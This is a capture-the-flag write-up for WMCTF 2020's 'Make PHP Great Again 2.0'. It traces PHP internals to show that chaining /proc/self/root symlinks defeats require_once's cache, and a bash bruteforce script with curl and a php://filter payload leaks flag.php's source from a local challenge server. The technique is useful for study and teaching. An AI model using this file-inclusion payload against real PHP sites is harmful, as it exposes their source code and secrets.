Title: Solution to WMCTF2020's Make PHP Great Again 2.0, or how to use filters with `require_once`
Date: 2024-04-15 13:00

I'm a huge fan of Asian CTF web challenges,
since they're usually self-contained, elegant and excessively <del>cursed</del> interesting. This one is
from [WMCTF 2020](https://ctftime.org/event/1094): Make PHP Great Again 2.0

```php
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}
```

The obvious way would be to make use of
[`PHP_SESSION_UPLOAD_PROGRESS`](https://php.net/manual/en/session.upload-progress.php)
to control the `PHPSESSID` and include the session file to get a shell. If you
have a way to make PHP segfault in the process to make it not remove the
temporary file, it's even better but not required.
This technique was the [expected solution](https://blog.orange.tw/2018/10/) to HITCON 2018 CTF's [One Line PHP
Challenge](https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/one-line-php-challenge),
also written by [Orange](https://blog.orange.tw/), based on a 2016 [bug report](https://bugs.php.net/bug.php?id=72681) from
taoguangchen. But what if the filesystem is completely read-only, or in a chroot,
or running on PHP without session support?

The other possible venue is to use stream wrappers, something like
`php://filter/convert.base64-encode/resource=flag.php`, but since `flag.php`
has already been included once, we can't include it a second time. Or can't we?
Well, odds are that we can, since I've [been told](https://twitter.com/paypayp4y/status/1679299009691947008)
that this was the expected solution.

To make `require_once` work, php needs some kind of cache. Let's create `flag.php`, and try to include it 
via a two different paths, to see what happens:

```console
$ cat <<EOF >|flag.php
<?php
$flag='FLAG{lol}';
EOF
$ strace -f  -- php -r 'include_once "flag.php"; include_once "flag.php";' 2>&1  | grep flag.php
execve("/usr/bin/php", ["php", "-r", "include_once \"flag.php\"; include"...], 0xffffc8f45200 /* 59 vars */) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/./flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(AT_FDCWD, "/home/jvoisin/flag.php", O_RDONLY) = 3
$ strace -f  -- php -r 'include_once "flag.php"; include_once "/home/jvoisin/flag.php";' 2>&1  | grep flag.php
execve("/usr/bin/php", ["php", "-r", "include_once \"flag.php\"; include"...], 0xffffe2c25e40 /* 59 vars */) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/./flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
newfstatat(AT_FDCWD, "/home/jvoisin/flag.php", {st_mode=S_IFREG|0644, st_size=7, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(AT_FDCWD, "/home/jvoisin/flag.php", O_RDONLY) = 3
$
```

So as expected, there is some kind of path normalization.

```console
$ ltrace -n 1  -s 1337 -f -x '@php' php -r 'include_once "flag.php"; include_once "/home/jvoisin/../jvoisin/flag.php";' 2>out.txt
$ less out.txt
[…] // search for `flag.php`
[pid 210076]       zend_stream_init_filename_ex(0xffffc734f208, 0xffff82a5c3c0, 104, 33)                                                                      = 0xffffc734f208
[pid 210076]       zend_stream_open(0xffffc734f208, 0xffff82a5c3c0, 2, 33 <unfinished ...>
[pid 210076]        php_stream_open_for_zend_ex(0xffffc734f208, 137, 0xaaab689b8ab0, 0 <unfinished ...>
[pid 210076]         _php_stream_open_wrapper_ex(0xffff82a5c3d8, 0xaaab68b363c8, 0x10089, 0xffffc734f1d0 <unfinished ...>
[pid 210076]          zend_is_executing(0xffff82a5c3d8, 22, 0, 0xffff83943b40)                                                                                = 1
[pid 210076]          php_resolve_path(0xffff82a5c3d8, 22, 0xaaab80b07648, 0xffff83943b40 <unfinished ...>
[pid 210076]           strlen("/home/jvoisin/flag.php")                                                                                                       = 22
[pid 210076]           __ctype_b_loc()                                                                                                                        = 0xffff838ffcf8
[pid 210076]           tsrm_realpath(0xffff82a5c3d8, 0, 0, 0xffff82a5c420 <unfinished ...>
[…]
```

PHP has its very own implementation of `realpath`, given how complex this
can be, especially in a multiplatform app, odds are that there are bugs lurking
there. Keep in mind that we're tracing compiled code, so a fair
share of PHP's spaghetti implementation is inlined. Time to read PHP's code now, yay.

Looking at [`zend_include_or_eval`](https://github.com/php/php-src/blob/cf313321c2e13319d479e0dd4f49094cc72cf652/Zend/zend_execute.c#L4873C55-L4873C75):

```C
static zend_never_inline zend_op_array* ZEND_FASTCALL zend_include_or_eval(zval *inc_filename_zv, int type) /* {{{ */
{
	zend_op_array *new_op_array = NULL;
	zend_string *tmp_inc_filename;
	zend_string *inc_filename = zval_try_get_tmp_string(inc_filename_zv, &tmp_inc_filename);
	if (UNEXPECTED(!inc_filename)) {
		return NULL;
	}

	switch (type) {
		case ZEND_INCLUDE_ONCE:
		case ZEND_REQUIRE_ONCE: {
				zend_file_handle file_handle;
				zend_string *resolved_path;

				resolved_path = zend_resolve_path(inc_filename);  // returns NULL for wrappers other than `file://`
				if (EXPECTED(resolved_path)) {
					if (zend_hash_exists(&EG(included_files), resolved_path)) {
						new_op_array = ZEND_FAKE_OP_ARRAY;
						zend_string_release_ex(resolved_path, 0);
						break;
					}
				} else if (UNEXPECTED(EG(exception))) {
					break;
				} else if (UNEXPECTED(strlen(ZSTR_VAL(inc_filename)) != ZSTR_LEN(inc_filename))) {
					zend_message_dispatcher(
						(type == ZEND_INCLUDE_ONCE) ?
							ZMSG_FAILED_INCLUDE_FOPEN : ZMSG_FAILED_REQUIRE_FOPEN,
							ZSTR_VAL(inc_filename));
					break;
				} else {
					resolved_path = zend_string_copy(inc_filename);  // So we get there
				}

				zend_stream_init_filename_ex(&file_handle, resolved_path);
				if (SUCCESS == zend_stream_open(&file_handle)) {

					if (!file_handle.opened_path) {
						file_handle.opened_path = zend_string_copy(resolved_path);  // We need to go here
					}

					if (zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path)) {
						new_op_array = zend_compile_file(&file_handle, (type==ZEND_INCLUDE_ONCE?ZEND_INCLUDE:ZEND_REQUIRE));
					} else {
						new_op_array = ZEND_FAKE_OP_ARRAY;
					}
				} else if (!EG(exception)) {
					zend_message_dispatcher(
						(type == ZEND_INCLUDE_ONCE) ?
							ZMSG_FAILED_INCLUDE_FOPEN : ZMSG_FAILED_REQUIRE_FOPEN,
							ZSTR_VAL(inc_filename));
				}
				zend_destroy_file_handle(&file_handle);
				zend_string_release_ex(resolved_path, 0);
			}
			break;
```

If we can find a way to make `zend_stream_open` return `SUCCESS` while not setting `file_handle.opened_path`, we can include the same file twice. Let's look at the call-stack from there:

```C
zend_include_or_eval
    zend_stream_open
         php_stream_open_for_zend (via zend_stream_open_function = utility_functions->stream_open_function, via utility_functions->stream_open_function = php_stream_open_for_zend)
            php_stream_open_for_zend_ex(handle, USE_PATH|REPORT_ERRORS|STREAM_OPEN_FOR_INCLUDE);
                 php_stream_open_wrapper((char *)ZSTR_VAL(filename), "rb", mode | STREAM_OPEN_FOR_ZEND_STREAM, &opened_path)
                    _php_stream_open_wrapper_ex((path), (mode), (options), (opened), NULL STREAMS_CC)
                        php_resolve_path(path, strlen(path), PG(include_path)) // doesn't resolve for filters other than `file://`
                        stream = wrapper->wops->stream_opener(wrapper, path_to_open, mode, options & ~REPORT_ERRORS, opened_path, context STREAMS_REL_CC);  // use gdb to resolve this
                            php_stream_fopen(filename, mode, opened)
                                _php_stream_fopen((filename), (mode), (opened), 0 STREAMS_CC)
                                    expand_filepath(filename, realpath)
                                        expand_filepath_ex(filepath, real_path, NULL, 0)
                                             expand_filepath_with_mode(filepath, real_path, relative_to, relative_to_len, CWD_FILEPATH)
                                                 virtual_file_ex(&new_state, filepath, NULL, realpath_mode)
                                                    tsrm_realpath_r(path, start, i-1, ll, t, use_realpath, 1, NULL)
                                                        php_sys_lstat(path, &st)
                                                            lstat
                                                        tsrm_realpath_r(path, 1, j, ll, t, use_realpath, is_dir, &directory)
                                                        tsrm_realpath_r(path, start, i + j, ll, t, use_realpath, is_dir, &directory)
                                                        tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL)
```

`tsrm_realpath_r` looks horrible complicated, dreadful and vile, calling itself
recursively multiple times, with some global states in the mix. In our case,
the two main interesting parts are the following ones:

```C
static size_t tsrm_realpath_r(char *path, size_t start, size_t len, int *ll, time_t *t, int use_realpath, bool is_dir, int *link_is_dir) /* {{{ */
{
        // […]
        if (save && php_sys_lstat(path, &st) < 0) {
            if (use_realpath == CWD_REALPATH) {
                /* file not found */
                return (size_t)-1;
            }
            /* continue resolution anyway but don't save result in the cache */
            save = 0;
        }
        // […]
                        j = tsrm_realpath_r(path, start, i-1, ll, t, save ? CWD_FILEPATH : use_realpath, 1, NULL);
}
```

Looking at `lstat`'s [manpage](https://linux.die.net/man/2/lstat), if one
chains [enough symlinks]( https://github.com/bminor/glibc/blob/ae7468a7b0bcf22e9cd5fcae42bb9e4f65de83ee/sysdeps/generic/eloop-threshold.h#L46),
it'll return an error. As usual with filesystem trickeries, `/proc` has
everything one needs, in our case `/proc/self/root`, a symlink to `/`, so we can
throw something like `/proc/self/root/proc/self/root/…` at `lstat` to force it to
return `-1` should we be so inclined.

The 2<sup>nd</sup> part is providing a way to make `use_realpath` different than
`CWD_REALPATH` to avoid returning an error, likely messing with PHP's path cache.

I started to write some ghetto-tracing via GDB:

```gdb
# echo '<?php echo "FLAG{lol}";' > ~/flag.php
# gdb `which php` --batch --command=trace.gs -iex 'set debuginfod enabled on' -q
set debuginfod enabled on

break tsrm_realpath_r
commands 1
        silent
        printf "path: %s\n", path
        printf "use_realpath: %d\n", use_realpath
        continue
end

set $link="/proc/self/root"
set $inc = "/home/jvoisin/flag.php"
set $idx=0
while($idx < 50)
        eval "set $inc = \"%s%s\"", $link, $inc
        eval "set args \"-r\" \"include_once 'flag.php'; include_once '%s';\"", $inc
        printf "Number of repetitions: %d", $idx
        run
        set $idx=$idx+1
end
```

But GDB is definitely too brittle and buggy to do anything like this, and the
[linux version of x64dbg](https://linux.x64dbg.com) isn't there yet, so I
settled for ctf-grade bash-powered bruteforcing instead of trying to understand what's going on,
adding an exciting human touch (in the form of pure laziness) into this cold
engineering mystery-solving blogpost.

```bash
$ cat bruteforce.sh
for i in {1..50}; do
  inc=$(seq $i | awk '{printf "/proc/self/root"}')
  echo $inc;
  args=$(printf 'include_once \"flag.php\"; include_once \"%s/home/jvoisin/flag.php\";' $inc)
  echo $args
  php -r "$args"
  echo
done
$ bash bruteforce.sh
/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

/proc/self/root/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}

//[…]

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root
include_once "flag.php"; include_once "/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/home/jvoisin/flag.php";
FLAG{lol}
FLAG{lol}

// […]
$
```

Looks like we can indeed confuse PHP about what was already included or
not. Rinse and repeat against the service to get the flag:

```
$ cat ./bruteforce.sh
for i in {15..50}; do
  inc=$(seq $i | awk '{printf "/proc/self/root"}')/proc/self/cwd/flag.php
  echo $i
  curl -s localhost:8080?file=php://filter/convert.base64-encode/resource=$inc | grep $(echo '<?php' | base64 -| head -c 3)
done
$ bash ./bruteforce.sh
15
16
17
18
19
20
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
21
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
22
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
23
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
24
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
25
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
26
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
27
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
28
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
29
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
30
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
31
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
32
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
33
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
34
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
35
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
36
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
37
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
38
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
39
</code>PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg==
40
41
42
43
44
45
46
47
48
49
50
$ echo PD9waHAKJGZsYWc9IkZMQUd7bG9sfSI7Cj8+Cg== | base64 -d
<?php
$flag="FLAG{lol}";
?>
$
```

Now, I have no clues why this works when passing anything between 21 and 40
symbolic links, and life is way too short to properly instrument/trace/ PHP nd
try to make sense of the results to properly understand what's going on.
